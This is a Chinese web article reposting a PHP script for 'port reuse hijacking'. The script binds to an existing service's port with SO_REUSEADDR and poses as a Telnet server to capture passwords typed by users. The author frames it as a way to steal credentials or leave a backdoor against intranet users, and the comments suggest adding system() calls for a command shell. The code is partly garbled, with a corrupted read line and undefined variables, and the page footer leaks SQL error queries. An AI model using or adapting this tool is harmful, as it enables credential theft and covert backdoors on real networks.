PHP下实现端口复用劫持

时间:2010-01-18 08:57:53   来源:第二电脑网  作者:第二电脑网

  第二电脑网导读:教。   #!/usr/bin/php -q   #c0dz by Darkness[BST]   #Team:www.bugkidz.org   #E-mail:cqxy[at]21cn.net   if ($argc != 3 || in_array($argc[1] , array('--help','-h','?')))   {   echo "Use:#./$argv[0] www.bugkidz.org 192.168.0.1 21rn"; ...
  正文:

  假如监听127.0.0.1 ,访问共网IP不受影响,假如监听公网IP,127。0。0。1等IP不受影响。
  这个可以用于欺骗用户密码,因为原来的服务不可用了。或者留成针对内网用户的后门。
  最后欢迎加MSN:CQXY[AT]21CN。NET赐教。
  #!/usr/bin/PHP -q
  #c0dz by Darkness[BST]
  #Team:www.bugkidz.org
  #E-mail:cqxy[at]21cn.net
  if ($argc != 3 || in_array($argc[1] , array('--help','-h','?')))
  {
  echo "Use:#./$argv[0] www.bugkidz.org 192.168.0.1 21rn";
  echo "c0dz By Darkness[BST]";
  exit;
  }
  error_reporting(E_ALL);
  
  set_time_limit(0);
  
  ob_implicit_flush();
  
  $host = $argv[1];
  $port = $argv[2];
  if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
  echo "socket_create() failed: reason: " . socket_strerror($sock) . "n";
  } /*建立SOCKET*/
  socket_set_option($sock,SOL_SOCKET,SO_REUSEADDR,1); /*设置SOCKET连接的属性为SO_REUSEADDR,这样才可以端口复用*/
  if (($ret = socket_bind($sock, $host, $port)) < 0) {
  echo "socket_bind() failed: reason: " . socket_strerror($ret) . "n";
  }/*绑定端口*/
  
  if (($ret = socket_listen($sock, 5)) < 0) {
  echo "socket_listen() failed: reason: " . socket_strerror($ret) . "n";
  } /*开始监听*/
  
  
  while(true) {
  
  if (($sniffer = socket_accept($sock)) < 0) {
  echo "socket_accept() failed: reason: " . socket_strerror($sniffer) . "n";
  break;
  }
  if ($port == 23)
  {
  $txt = "Welcome to the Telnet Serverrn";
  $txt .="User:rn";
  socket_write($sniffer, $txt, strlen($txt));
  } /*这里是伪装信息,把自己伪装成原来的TELNET服务器,这样来骗取密码*/
  
  while(true) {
  
  if(($buf _read($sniffer">=@socket_read($sniffer, 2048, PHP_BINARY_READ)) ==false)
  {
  
  break;
  
  }
  
  if (!$buf = trim($buf)) {
  continue;
  }
  
  
  if ($buf == '!quit') {
  break;
  }
  if ($buf == '!shutdown') {
  socket_close($sniffer);
  break 2; /*其实这里可以调用system(),搞成一个CMD后门,反正你想怎么改都可以*/
  }
  
  $sniff_data = "$bufrn";
  
  /* else socket_write($sniffer, $sniff_data, strlen($sniff_data));*/
  echo $sniff_data;
  /*输出字符串,这里可以加进文件处理,保存密码什么的*/
  }
  socket_close($sniffer);
  
  
  }
  socket_close($resock);
  socket_close($sock);
  ?>


来源:http://www.002pc.com/master/College/Programming/PHP/11976.html

收藏到:

关于《PHP下实现端口复用劫持》文章的评论

共有 0 位网友发表了评论 此处只显示部分留言 点击查看完整评论页面

随机文章

    SQL Error: select * from ***_ecms_article where classid='86' and checked=1 order by rand() limit 10

顶出来的热门

    SQL Error: select * from ***_ecms_article where classid='86' and checked=1 order by diggtop desc,id desc limit 10
站内搜索: 高级搜索

热门搜索: Windows style 系统 tr IP QQ CPU 安装 function 注册 if td